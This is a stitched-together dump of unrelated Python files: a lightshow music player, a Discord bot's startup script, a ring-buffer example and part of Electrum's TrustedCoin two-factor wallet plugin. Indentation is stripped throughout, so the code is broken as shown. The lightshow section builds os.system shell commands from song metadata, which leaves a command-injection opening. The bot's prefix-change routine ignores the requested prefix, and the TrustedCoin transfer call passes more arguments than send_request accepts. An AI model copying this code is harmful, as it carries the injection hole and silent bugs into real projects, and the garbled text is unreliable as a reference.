lsc = "custom_lightshow"
always_on = "always_on_channels"
if config.has_option(lsc, always_on):
cm.lightshow.always_on_channels = map(int, config.get(lsc, always_on).split(","))
always_off = "always_off_channels"
if config.has_option(lsc, always_off):
cm.lightshow.always_off_channels = map(int, config.get(lsc, always_off).split(","))
inverted = "invert_channels"
if config.has_option(lsc, inverted):
cm.lightshow.inverted_channels = map(int, config.get(lsc, inverted).split(","))
attenuate = "attenuate_pct"
if config.has_option(lsc, attenuate):
self.attenuate_pct = float(config.get(lsc, attenuate))
# setup up custom preshow
has_preshow_configuration = config.has_option(lsc, 'preshow_configuration')
has_preshow_script = config.has_option(lsc, 'preshow_script')
if has_preshow_configuration or has_preshow_script:
preshow = None
try:
preshow_configuration = config.get(lsc, 'preshow_configuration')
except configparser.NoOptionError:
preshow_configuration = None
try:
preshow_script = config.get(lsc, 'preshow_script')
except configparser.NoOptionError:
preshow_script = None
if preshow_configuration and not preshow_script:
try:
preshow = json.loads(preshow_configuration)
except (ValueError, TypeError) as error:
msg = "Preshow_configuration not defined or not in JSON format."
log.error(msg + str(error))
else:
if os.path.isfile(preshow_script):
preshow = preshow_script
cm.lightshow.preshow = preshow
# setup postshow
has_postshow_configuration = config.has_option(lsc, 'postshow_configuration')
has_postshow_script = config.has_option(lsc, 'postshow_script')
if has_postshow_configuration or has_postshow_script:
postshow = None
postshow_configuration = config.get(lsc, 'postshow_configuration')
postshow_script = config.get(lsc, 'postshow_script')
if postshow_configuration and not postshow_script:
try:
postshow = json.loads(postshow_configuration)
except (ValueError, TypeError) as error:
msg = "Postshow_configuration not defined or not in JSON format."
log.error(msg + str(error))
else:
if os.path.isfile(postshow_script):
postshow = postshow_script
cm.lightshow.postshow = postshow
if config.has_section('custom_audio_processing'):
if config.has_option('custom_audio_processing', 'min_frequency'):
cm.audio_processing.min_frequency = \
config.getfloat('custom_audio_processing', 'min_frequency')
if config.has_option('custom_audio_processing', 'max_frequency'):
cm.audio_processing.max_frequency = \
config.getfloat('custom_audio_processing', 'max_frequency')
if config.has_option('custom_audio_processing', 'custom_channel_mapping'):
temp = config.get('custom_audio_processing', 'custom_channel_mapping')
cm.audio_processing.custom_channel_mapping = \
map(int, temp.split(',')) if temp else 0
if config.has_option('custom_audio_processing', 'custom_channel_frequencies'):
temp = config.get('custom_audio_processing', 'custom_channel_frequencies')
cm.audio_processing.custom_channel_frequencies = \
map(int, temp.split(',')) if temp else 0
def setup_audio(self):
"""Setup audio file
and setup the output. device.output is a lambda that will send data to
fm process or to the specified ALSA sound card
"""
# Set up audio
force_header = False
if any([ax for ax in [".mp4", ".m4a", ".m4b"] if ax in self.song_filename]):
force_header = True
self.music_file = decoder.open(self.song_filename, force_header)
self.sample_rate = self.music_file.getframerate()
self.num_channels = self.music_file.getnchannels()
self.fft_calc = fft.FFT(self.chunk_size,
self.sample_rate,
cm.hardware.gpio_len,
cm.audio_processing.min_frequency,
cm.audio_processing.max_frequency,
cm.audio_processing.custom_channel_mapping,
cm.audio_processing.custom_channel_frequencies,
2,
cm.audio_processing.use_gpu)
# setup output device
self.set_audio_device()
chunks_per_sec = ((16 * self.num_channels * self.sample_rate) / 8) / self.chunk_size
self.light_delay = int(cm.lightshow.light_delay * chunks_per_sec)
# Output a bit about what we're about to play to the logs
num_frames = str(self.music_file.getnframes() / self.sample_rate)
log.info("Playing: " + self.song_filename + " (" + num_frames + " sec)")
def setup_cache(self):
"""Setup the cache_matrix, std and mean
loading them from a file if it exists, otherwise create empty arrays to be filled
:raise IOError:
"""
# create empty array for the cache_matrix
self.cache_matrix = np.empty(shape=[0, cm.hardware.gpio_len])
self.cache_found = False
# The values 12 and 1.5 are good estimates for first time playing back
# (i.e. before we have the actual mean and standard deviations
# calculated for each channel).
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
if args.readcache:
# Read in cached fft
try:
# compare configuration of cache file to current configuration
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
if not self.cache_found:
# create empty array for the cache_matrix
self.cache_matrix = np.empty(shape=[0, cm.hardware.gpio_len])
raise IOError()
else:
# load cache from file using numpy loadtxt
self.cache_matrix = np.loadtxt(self.cache_filename)
# get std from matrix / located at index 0
self.std = np.array(self.cache_matrix[0])
# get mean from matrix / located at index 1
self.mean = np.array(self.cache_matrix[1])
# delete mean and std from the array
self.cache_matrix = np.delete(self.cache_matrix, 0, axis=0)
self.cache_matrix = np.delete(self.cache_matrix, 0, axis=0)
log.debug("std: " + str(self.std) + ", mean: " + str(self.mean))
except IOError:
self.cache_found = self.fft_calc.compare_config(self.cache_filename)
msg = "Cached sync data song_filename not found: '"
log.warning(msg + self.cache_filename + "'. One will be generated.")
def save_cache(self):
"""
Save matrix, std, and mean to cache_filename for use during future playback
"""
# Compute the standard deviation and mean values for the cache
mean = np.empty(cm.hardware.gpio_len, dtype='float32')
std = np.empty(cm.hardware.gpio_len, dtype='float32')
for pin in range(0, cm.hardware.gpio_len):
std[pin] = np.std([item for item in self.cache_matrix[:, pin] if item > 0])
mean[pin] = np.mean([item for item in self.cache_matrix[:, pin] if item > 0])
# Add mean and std to the top of the cache
self.cache_matrix = np.vstack([mean, self.cache_matrix])
self.cache_matrix = np.vstack([std, self.cache_matrix])
# Save the cache using numpy savetxt
np.savetxt(self.cache_filename, self.cache_matrix)
# Save fft config
self.fft_calc.save_config()
cm_len = str(len(self.cache_matrix))
log.info("Cached sync data written to '." + self.cache_filename + "' [" + cm_len + " rows]")
log.info("Cached config data written to '." + self.fft_calc.config_filename)
def get_song(self):
"""
Determine the next file to play
:return: tuple containing 3 strings: song_filename, config_filename, cache_filename
:rtype: tuple
"""
play_now = int(cm.get_state('play_now', "0"))
song_to_play = int(cm.get_state('song_to_play', "0"))
self.song_filename = args.file
if args.playlist is not None and args.file is None:
most_votes = [None, None, []]
songs = cm.get_playlist(args.playlist)
for song in songs:
if len(song[2]) > 0:
if len(song[2]) >= len(most_votes[2]):
most_votes = song
if most_votes[0] is not None:
log.info("Most Votes: " + str(most_votes))
current_song = most_votes
# Update playlist with latest votes
for song in songs:
if current_song[0:3] == song[0:3] and len(song) == 3:
song.append("playing!")
# Update playlist file
cm.write_playlist(songs, args.playlist)
else:
# Get a "play now" requested song
if 0 < play_now <= len(songs):
current_song = songs[play_now - 1]
# Get random song
elif cm.lightshow.randomize_playlist:
current_song = songs[random.randrange(0, len(songs))]
# Play next song in the lineup
else:
if not (song_to_play <= len(songs) - 1):
song_to_play = 0
current_song = songs[song_to_play]
if (song_to_play + 1) <= len(songs) - 1:
next_song = (song_to_play + 1)
else:
next_song = 0
cm.update_state('song_to_play', str(next_song))
# Get filename to play and store the current song playing in state cfg
self.song_filename = current_song[1]
if (cm.fm.radio_text == "playlist"):
cm.fm.radio_text = current_song[0]
cm.update_state('current_song', str(songs.index(current_song)))
self.song_filename = self.song_filename.replace("$SYNCHRONIZED_LIGHTS_HOME", cm.home_dir)
filename = os.path.abspath(self.song_filename)
self.config_filename = \
os.path.dirname(filename) + "/." + os.path.basename(self.song_filename) + ".cfg"
self.cache_filename = \
os.path.dirname(filename) + "/." + os.path.basename(self.song_filename) + ".sync"
os.system("/bin/echo \"\" >" + cm.home_dir + "/logs/now_playing.txt")
metadata = mutagen.File(self.song_filename, easy=True)
if not metadata is None:
if "title" in metadata and "artist" in metadata:
now_playing = "Now Playing " + metadata["title"][0] + " by " + metadata["artist"][0]
elif "title" in metadata:
now_playing = "Now Playing " + metadata["title"][0]
else:
now_playing = "Now Playing Unknown"
if cm.lightshow.songname_command:
os.system(cm.lightshow.songname_command + " \"" + now_playing + "\"")
else:
now_playing = "Now Playing " + os.path.basename(self.song_filename)
os.system("/bin/echo " + " \"" + now_playing + "\"" + " >" + cm.home_dir + "/logs/now_playing.txt")
def play_song(self):
"""Play the next song from the play list (or --file argument)."""
# get the next song to play
self.get_song()
# load custom configuration from file
self.load_custom_config()
# Initialize Lights
self.network.set_playing()
hc.initialize()
# Handle the pre/post show
play_now = int(cm.get_state('play_now', "0"))
self.network.unset_playing()
if not play_now:
result = PrePostShow('preshow', hc).execute()
if result == PrePostShow.play_now_interrupt:
play_now = int(cm.get_state('play_now', "0"))
self.network.set_playing()
# Ensure play_now is reset before beginning playback
if play_now:
cm.update_state('play_now', "0")
play_now = 0
# setup audio file and output device
self.setup_audio()
# setup our cache_matrix, std, mean
self.setup_cache()
matrix_buffer = deque([], 1000)
# Process audio song_filename
row = 0
data = self.music_file.readframes(self.chunk_size)
if args.createcache:
total_frames = self.music_file.getnframes() / 100
counter = 0
percentage = 0
while data != b'':
# Compute FFT in this chunk, and cache results
matrix = self.fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
self.cache_matrix = np.vstack([self.cache_matrix, matrix])
data = self.music_file.readframes(self.chunk_size)
if counter > total_frames:
percentage += 1
counter = 0
counter += self.chunk_size
sys.stdout.write("\rGenerating sync file for :%s %d%%" % (self.song_filename,
percentage))
sys.stdout.flush()
sys.stdout.write("\rGenerating sync file for :%s %d%%" % (self.song_filename, 100))
sys.stdout.flush()
data = b''
self.cache_found = False
play_now = False
print("\nsaving sync file")
while data != b'' and not play_now:
# output data to sound device
self.output(data)
# Control lights with cached timing values if they exist
matrix = None
if self.cache_found and args.readcache:
if row < len(self.cache_matrix):
matrix = self.cache_matrix[row]
else:
log.warning("Ran out of cached FFT values, will update the cache.")
self.cache_found = False
if matrix is None:
# No cache - Compute FFT in this chunk, and cache results
matrix = self.fft_calc.calculate_levels(data)
# Add the matrix to the end of the cache
self.cache_matrix = np.vstack([self.cache_matrix, matrix])
matrix_buffer.appendleft(matrix)
if len(matrix_buffer) > self.light_delay:
matrix = matrix_buffer[self.light_delay]
self.update_lights(matrix)
# Read next chunk of data from music song_filename
data = self.music_file.readframes(self.chunk_size)
row += 1
# Load new application state in case we've been interrupted
cm.load_state()
play_now = int(cm.get_state('play_now', "0"))
if not self.cache_found and not play_now:
self.save_cache()
# Cleanup the pifm process
if cm.fm.enabled:
self.fm_process.kill()
# check for postshow
self.network.unset_playing()
if not play_now:
PrePostShow('postshow', hc).execute()
# We're done, turn it all off and clean up things ;)
hc.clean_up()
def network_client(self):
"""Network client support
If in client mode, ignore everything else and just
read data from the network and blink the lights
"""
log.info("Network client mode starting")
print("Network client mode starting...")
print("press CTRL<C> to end")
hc.initialize()
print
try:
channels = self.network.channels
channel_keys = channels.keys()
while True:
data = self.network.receive()
if hc.led and isinstance(data[0], np.ndarray):
for led_instance in hc.led:
led_instance.write_all(data[0])
if isinstance(data[0], int):
pin = data[0]
if pin in channel_keys:
hc.set_light(channels[pin], True, float(data[1]))
continue
elif isinstance(data[0], np.ndarray):
brightness_levels = data[0]
else:
continue
for pin in channel_keys:
hc.set_light(channels[pin], True, brightness_levels[pin])
except KeyboardInterrupt:
log.info("CTRL<C> pressed, stopping")
print("stopping")
self.network.close_connection()
hc.clean_up()
def launch_curses(self, screen):
self.terminal.init(screen)
def enqueue_output(self, out, queue):
for line in iter(out.readline, b''):
queue.put(line)
out.close()
if __name__ == "__main__":
if args.log:
level = levels.get(args.log.upper())
elif cm.lightshow.log_level != "":
level = levels.get(cm.lightshow.log_level.upper())
else:
level = levels.get('INFO')
log.getLogger().setLevel(level)
# Make sure one of --playlist or --file was specified
if args.file is None and args.playlist is None:
print("One of --playlist or --file must be specified")
sys.exit()
lightshow = Lightshow()
if "-in" in cm.lightshow.mode:
lightshow.audio_in()
elif lightshow.client:
lightshow.network_client()
else:
lightshow.play_song()
|
main.py
|
## -- IMPORTING -- ##
# MODULE
import multiprocessing
import os
import datetime
import certifi
import disnake
import json
import time
import logging
from disnake.ext import commands
from pymongo import MongoClient
from dotenv import load_dotenv
from threading import Thread
# FILES
from extra import functions
from extra import config
from app import run_api
## -- VARIABLES / FUNCTIONS -- ##
load_dotenv()
# LOGGERS
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("disnake")
logger.setLevel(logging.INFO)
handler = logging.FileHandler(filename='disnake.log', encoding='utf-8', mode='w')
handler.setFormatter(logging.Formatter('%(asctime)s:%(levelname)s:%(name)s: %(message)s'))
logger.addHandler(handler)
# TOKENS
bot_token = str(os.environ.get("BOT_TOKEN"))
test_bot_token = str(os.environ.get("TEST_BOT_TOKEN"))
mongo_token = os.environ.get("MONGO_LOGIN")
api_key = os.environ.get("API_KEY")
# DATABASE VARIABLES
client = MongoClient(f"{mongo_token}", tlsCAFile=certifi.where())
db = client[config.database_collection]
prefixes_col = db["prefixes"]
confirmations_col = db["bot_farm_confirmations"]
server_data_col = db["server_data"]
# IMPORTANT FUNCTIONS
def get_prefix(bot, message: disnake.Message):
query = {"guild_id": str(message.guild.id)}
data = functions.get_db_data(message.guild.id)
result = server_data_col.find_one(query)
if not result:
server_data_col.insert_one(data)
return commands.when_mentioned_or(config.default_prefix)(bot, message)
elif not result.get("prefix"):
server_data_col.update_one(query, {"$set": {"prefix": "?"}})
return commands.when_mentioned_or(config.default_prefix)(bot, message)
return commands.when_mentioned_or(result["prefix"])(bot, message)
async def load_cogs(bot: commands.Bot):
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py"): continue
file = file[:-3]
try:
bot.load_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
print("Loaded all commands.")
# BOT
class Bot(commands.Bot):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.launch_time = datetime.datetime.utcnow()
async def on_ready(self):
self.avatar = await self.user.avatar.read()
status_channel = self.get_channel(config.messages_channel)
embed = disnake.Embed(title=f"Singed In As: {bot.user.name} ({bot.user.id})",
description=f"Bot started in `{str(len(bot.guilds))}` servers, with total of `{len(bot.users)}` users, on an average latency of `{round(bot.latency * 1000)} ms`.",
color=config.success_embed_color)
await status_channel.send(embed=embed)
print(f"Bot started on {'the server' if config.is_server else 'a local computer'}. Stats: {len(bot.guilds)} servers, {len(bot.users)} users.")
with open("data/stats.json", 'w') as f:
json.dump({"commands_run": 0}, f)
async def load_cogs(self, specific_cog: str = None):
if not specific_cog:
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py"): return
file = file[:-3]
try:
self.load_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
print("Loaded all commands.")
else:
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py") or file[:-3] != specific_cog: return
file = file[:-3]
try:
self.load_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
async def unload_cogs(self, specific_cog: str = None):
if not specific_cog:
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py"): return
file = file[:-3]
try:
self.unload_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
else:
for folder in os.listdir("./commands"):
for file in os.listdir(f"./commands/{folder}"):
if not file.endswith(".py") or file[:-3] != specific_cog: return
file = file[:-3]
try:
self.unload_extension(f"commands.{folder}.{file}")
except Exception as e:
print(e)
def get_bot_prefix(self, guild_id: int) -> str:
query = {"guild_id" : str(guild_id)}
data = functions.get_db_data(guild_id)
update = { "$set": { "guild_id" : str(guild_id), "prefix" : "?" } }
result = server_data_col.find_one(filter=query, limit=1)
if not result or not result["prefix"]:
if not result:
server_data_col.insert_one(data)
elif result and not result["prefix"]:
server_data_col.update_one(query, update)
return server_data_col.find_one(query)["prefix"]
def change_prefix(self, guild_id: int, new_prefix: str) -> str:
query = {"guild_id" : str(guild_id)}
data = functions.get_db_data(guild_id)
update = { "$set": { "guild_id" : str(guild_id), "prefix" : "?" } }
result = server_data_col.find_one(filter=query, limit=1)
if not result:
server_data_col.insert_one(data)
else:
server_data_col.update_one(filter=query, update=update)
result = self.get_bot_prefix(guild_id)
if result == new_prefix:
return result
else:
return False
bot = Bot(
command_prefix=get_prefix,
intents=disnake.Intents.all(),
status=disnake.Status.idle,
activity=disnake.Game(name="booting up.."),
case_insensitive=True,
# test_guilds=[int(config.bot_server)],
sync_permissions=True
)
## -- COGS -- ##
@bot.slash_command(name="cogs", description="Manages the bot's cogs.", default_permission=False, guild_ids=[config.bot_server])
@commands.guild_permissions(guild_id=int(config.bot_server), roles={871899070283800636: True})
async def cogs(inter):
pass
@cogs.sub_command(name="load", description="Load a specific cog.")
async def loadcog(inter, cog: str):
try:
await inter.response.defer()
except Exception:
pass
await bot.load_cogs(cog)
embed = disnake.Embed(description=f"{config.yes} Loaded `{cog}` successfully.", color=config.success_embed_color)
try:
await inter.send(embed=embed, ephemeral=True)
except Exception:
pass
@cogs.sub_command_group(name="reload")
async def reload(inter):
pass
@reload.sub_command(name="all", description="Reload all cogs.")
async def reloadcogs(inter):
try:
await inter.response.defer()
except Exception:
pass
await bot.unload_cogs()
await bot.load_cogs()
embed = disnake.Embed(description=f"{config.yes} Reloaded all cogs successfully.", color=config.success_embed_color)
try:
await inter.send(embed=embed, ephemeral=True)
except Exception:
pass
@reload.sub_command(name="cog", description="Reload one specific cog.")
async def reloadcog(inter, cog: str):
try:
await inter.response.defer()
except Exception:
pass
await bot.unload_cogs(cog)
await bot.load_cogs(cog)
embed = disnake.Embed(description=f"{config.yes} Reloaded `{cog}` successfully.", color=config.success_embed_color)
try:
await inter.send(embed=embed, ephemeral=True)
except Exception:
pass
@bot.command()
async def reloadcogs(ctx: commands.Context, hidden=True):
if ctx.author.id not in config.owners:
return
await bot.unload_cogs()
await bot.load_cogs()
embed = disnake.Embed(description=f"{config.yes} Reloaded all cogs successfully.", color=config.success_embed_color)
await ctx.send(embed=embed)
## -- RUNNING BOT -- ##
if __name__ == "__main__":
if not config.is_server:
Thread(target=run_api).start()
bot.loop.create_task(load_cogs(bot))
bot.run(bot_token if config.is_server else test_bot_token)
|
example_ctypes.py
|
#!/usr/bin/env python3
"""Simple example with ctypes.Structures."""
import ctypes
import multiprocessing
import os
import random
import time
from context import ringbuffer
class Record(ctypes.Structure):
_fields_ = [
('write_number', ctypes.c_uint),
('timestamp_microseconds', ctypes.c_ulonglong),
('length', ctypes.c_uint),
('data', ctypes.c_ubyte * 1000),
]
def writer(ring, start, count):
for i in range(start, start + count):
data = os.urandom(random.randint(1, 1000))
time_micros = int(time.time() * 10**6)
record = Record(
write_number=i,
timestamp_microseconds=time_micros,
length=len(data))
# Note: You can't pass 'data' to the constructor without doing an
# additional copy to convert the bytes type to a c_ubyte * 1000. So
# instead, the constructor will initialize the 'data' field's bytes
# to zero, and then this assignment overwrites the data-sized part.
record.data[:len(data)] = data
try:
ring.try_write(record)
except ringbuffer.WaitingForReaderError:
print('Reader is too slow, dropping %d' % i)
continue
if i and i % 100 == 0:
print('Wrote %d so far' % i)
ring.writer_done()
print('Writer is done')
def reader(ring, pointer):
while True:
try:
data = ring.blocking_read(pointer)
except ringbuffer.WriterFinishedError:
return
record = Record.from_buffer(data)
if record.write_number and record.write_number % 100 == 0:
print('Reader %s saw record %d at timestamp %d with %d bytes' %
(id(pointer), record.write_number,
record.timestamp_microseconds, record.length))
print('Reader %r is done' % id(pointer))
def main():
ring = ringbuffer.RingBuffer(slot_bytes=50000, slot_count=10)
ring.new_writer()
processes = [
multiprocessing.Process(target=reader, args=(ring, ring.new_reader())),
multiprocessing.Process(target=reader, args=(ring, ring.new_reader())),
multiprocessing.Process(target=writer, args=(ring, 1, 1000)),
]
for p in processes:
p.daemon = True
p.start()
for p in processes:
p.join(timeout=20)
assert not p.is_alive()
assert p.exitcode == 0
if __name__ == '__main__':
main()
|
trustedcoin.py
|
#!/usr/bin/env python
#
# Electrum - Lightweight Bitcoin Client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import asyncio
import socket
import os
import json
import base64
from urllib.parse import urljoin
from urllib.parse import quote
from electrum import bitcoin, ecc, constants, keystore, version
from electrum.bitcoin import *
from electrum.transaction import TxOutput
from electrum.mnemonic import Mnemonic
from electrum.wallet import Multisig_Wallet, Deterministic_Wallet
from electrum.i18n import _
from electrum.plugin import BasePlugin, hook
from electrum.util import NotEnoughFunds, make_aiohttp_session
from electrum.storage import STO_EV_USER_PW
from electrum.network import Network
# signing_xpub is hardcoded so that the wallet can be restored from seed, without TrustedCoin's server
def get_signing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4XdmyJQcCPjQfg6RXVUzGFhPjZ7uvRC8JLcS7Hw1i7UTpyhp9grHpak4TyK2hzBJrujDVLXQ6qB5tNpVx9rC6ixijUXadnmY"
else:
return "xpub661MyMwAqRbcGnMkaTx2594P9EDuiEqMq25PM2aeG6UmwzaohgA6uDmNsvSUV8ubqwA3Wpste1hg69XHgjUuCD5HLcEp2QPzyV1HMrPppsL"
def get_billing_xpub():
if constants.net.TESTNET:
return "tpubD6NzVbkrYhZ4X11EJFTJujsYbUmVASAYY7gXsEt4sL97AMBdypiH1E9ZVTpdXXEy3Kj9Eqd1UkxdGtvDt5z23DKsh6211CfNJo8bLLyem5r"
else:
return "xpub6DTBdtBB8qUmH5c77v8qVGVoYk7WjJNpGvutqjLasNG1mbux6KsojaLrYf2sRhXAVU4NaFuHhbD9SvVPRt1MB1MaMooRuhHcAZH1yhQ1qDU"
SEED_PREFIX = version.SEED_PREFIX_2FA
DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"It uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. To use this service, you will need a smartphone with "
"Google Authenticator installed."),
_("A small fee will be charged on each transaction that uses the "
"remote server. You may check and modify your billing preferences "
"once the installation is complete."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
_("The next step will generate the seed of your wallet. This seed will "
"NOT be saved in your computer, and it must be stored on paper. "
"To be safe from malware, you may want to do this on an offline "
"computer, and move your wallet later to an online computer."),
]
KIVY_DISCLAIMER = [
_("Two-factor authentication is a service provided by TrustedCoin. "
"To use it, you must have a separate device with Google Authenticator."),
_("This service uses a multi-signature wallet, where you own 2 of 3 keys. "
"The third key is stored on a remote server that signs transactions on "
"your behalf. A small fee will be charged on each transaction that uses the "
"remote server."),
_("Note that your coins are not locked in this service. You may withdraw "
"your funds at any time and at no cost, without the remote server, by "
"using the 'restore wallet' option with your wallet seed."),
]
RESTORE_MSG = _("Enter the seed for your 2-factor wallet:")
class TrustedCoinException(Exception):
def __init__(self, message, status_code=0):
Exception.__init__(self, message)
self.status_code = status_code
class ErrorConnectingServer(Exception):
pass
class TrustedCoinCosignerClient(object):
def __init__(self, user_agent=None, base_url='https://api.trustedcoin.com/2/'):
self.base_url = base_url
self.debug = False
self.user_agent = user_agent
def send_request(self, method, relative_url, data=None):
network = Network.get_instance()
if network:
return asyncio.run_coroutine_threadsafe(self._send_request(method, relative_url, data), network.asyncio_loop).result()
else:
raise ErrorConnectingServer('You are offline.')
async def handle_response(self, resp):
if resp.status != 200:
try:
r = await resp.json()
message = r['message']
except:
message = await resp.text()
raise TrustedCoinException(message, resp.status)
try:
return await resp.json()
except:
return await resp.text()
async def _send_request(self, method, relative_url, data):
url = urljoin(self.base_url, relative_url)
if self.debug:
print('%s %s %s' % (method, url, data))
headers = {}
if self.user_agent:
headers['user-agent'] = self.user_agent
try:
proxy = Network.get_instance().proxy
async with make_aiohttp_session(proxy) as session:
if method == 'get':
async with session.get(url, params=data, headers=headers) as resp:
return await self.handle_response(resp)
elif method == 'post':
async with session.post(url, json=data, headers=headers) as resp:
return await self.handle_response(resp)
else:
assert False
except TrustedCoinException:
raise
except Exception as e:
raise ErrorConnectingServer(e)
def get_terms_of_service(self, billing_plan='electrum-per-tx-otp'):
"""
Returns the TOS for the given billing plan as a plain/text unicode string.
:param billing_plan: the plan to return the terms for
"""
payload = {'billing_plan': billing_plan}
return self.send_request('get', 'tos', payload)
def create(self, xpubkey1, xpubkey2, email, billing_plan='electrum-per-tx-otp'):
"""
Creates a new cosigner resource.
:param xpubkey1: a bip32 extended public key (customarily the hot key)
:param xpubkey2: a bip32 extended public key (customarily the cold key)
:param email: a contact email
:param billing_plan: the billing plan for the cosigner
"""
payload = {
'email': email,
'xpubkey1': xpubkey1,
'xpubkey2': xpubkey2,
'billing_plan': billing_plan,
}
return self.send_request('post', 'cosigner', payload)
def auth(self, id, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param otp: the one time password
"""
payload = {'otp': otp}
return self.send_request('post', 'cosigner/%s/auth' % quote(id), payload)
def get(self, id):
""" Get billing info """
return self.send_request('get', 'cosigner/%s' % quote(id))
def get_challenge(self, id):
""" Get challenge to reset Google Auth secret """
return self.send_request('get', 'cosigner/%s/otp_secret' % quote(id))
def reset_auth(self, id, challenge, signatures):
""" Reset Google Auth secret """
payload = {'challenge':challenge, 'signatures':signatures}
return self.send_request('post', 'cosigner/%s/otp_secret' % quote(id), payload)
def sign(self, id, transaction, otp):
"""
Attempt to authenticate for a particular cosigner.
:param id: the id of the cosigner
:param transaction: the hex encoded [partially signed] compact transaction to sign
:param otp: the one time password
"""
payload = {
'otp': otp,
'transaction': transaction
}
return self.send_request('post', 'cosigner/%s/sign' % quote(id), payload)
def transfer_credit(self, id, recipient, otp, signature_callback):
"""
Transfer a cosigner's credits to another cosigner.
:param id: the id of the sending cosigner
:param recipient: the id of the recipient cosigner
:param otp: the one time password (of the sender)
:param signature_callback: a callback that signs a text message using xpubkey1/0/0 returning a compact sig
"""
payload = {
'otp': otp,
'recipient': recipient,
'timestamp': int(time.time()),
}
relative_url = 'cosigner/%s/transfer' % quote(id)
full_url = urljoin(self.base_url, relative_url)
headers = {
'x-signature': signature_callback(full_url + '\n' + json.dumps(payload))
}
return self.send_request('post', relative_url, payload, headers)
server = TrustedCoinCosignerClient(user_agent="Electrum/" + version.ELECTRUM_VERSION)
class Wallet_2fa(Multisig_Wallet):
wallet_type = '2fa'
def __init__(self, storage):
self.m, self.n = 2, 3
Deterministic_Wallet.__init__(self, storage)
self.is_billing = False
self.billing_info = None
self._load_billing_addresses()
def _load_billing_addresses(self):
billing_addresses = self.storage.get('trustedcoin_billing_addresses', {})
self._billing_addresses = {} # index -> addr
# convert keys from str to int
for index, addr in list(billing_addresses.items()):
self._billing_addresses[int(index)] = addr
self._billing_addresses_set = set(self._billing_addresses.values()) # set of addrs
def can_sign_without_server(self):
return not self.keystores['x2/'].is_watching_only()
def get_user_id(self):
return get_user_id(self.storage)
def min_prepay(self):
return min(self.price_per_tx.keys())
def num_prepay(self, config):
default = self.min_prepay()
n = config.get('trustedcoin_prepay', default)
if n not in self.price_per_tx:
n = default
return n
def extra_fee(self, config):
if self.can_sign_without_server():
return 0
if self.billing_info is None:
self.plugin.start_request_thread(self)
return 0
if self.billing_info.get('tx_remaining'):
return 0
if self.is_billing:
return 0
n = self.num_prepay(config)
price = int(self.price_per_tx[n])
if price > 100000 * n:
raise Exception('too high trustedcoin fee ({} for {} txns)'.format(price, n))
return price
def make_unsigned_transaction(self, coins, outputs, config, fixed_fee=None,
change_addr=None, is_sweep=False):
mk_tx = lambda o: Multisig_Wallet.make_unsigned_transaction(
self, coins, o, config, fixed_fee, change_addr)
fee = self.extra_fee(config) if not is_sweep else 0
if fee:
address = self.billing_info['billing_address']
fee_output = TxOutput(TYPE_ADDRESS, address, fee)
try:
tx = mk_tx(outputs + [fee_output])
except NotEnoughFunds:
# TrustedCoin won't charge if the total inputs is
# lower than their fee
tx = mk_tx(outputs)
if tx.input_value() >= fee:
raise
self.print_error("not charging for this tx")
else:
tx = mk_tx(outputs)
return tx
def on_otp(self, tx, otp):
if not otp:
self.print_error("sign_transaction: no auth code")
return
otp = int(otp)
long_user_id, short_id = self.get_user_id()
raw_tx = tx.serialize_to_network()
r = server.sign(short_id, raw_tx, otp)
if r:
raw_tx = r.get('transaction')
tx.update(raw_tx)
self.print_error("twofactor: is complete", tx.is_complete())
# reset billing_info
self.billing_info = None
self.plugin.start_request_thread(self)
def add_new_billing_address(self, billing_index: int, address: str):
saved_addr = self._billing_addresses.get(billing_index)
if saved_addr is not None:
if saved_addr == address:
return # already saved this address
else:
raise Exception('trustedcoin billing address inconsistency.. '
'for index {}, already saved {}, now got {}'
.format(billing_index, saved_addr, address))
# do we have all prior indices? (are we synced?)
largest_index_we_have = max(self._billing_addresses) if self._billing_addresses else -1
if largest_index_we_have + 1 < billing_index: # need to sync
for i in range(largest_index_we_have + 1, billing_index):
addr = make_billing_address(self, i)
self._billing_addresses[i] = addr
self._billing_addresses_set.add(addr)
# save this address; and persist to disk
self._billing_addresses[billing_index] = address
self._billing_addresses_set.add(address)
self.storage.put('trustedcoin_billing_addresses', self._billing_addresses)
# FIXME this often runs in a daemon thread, where storage.write will fail
self.storage.write()
def is_billing_address(self, addr: str) -> bool:
return addr in self._billing_addresses_set
# Utility functions
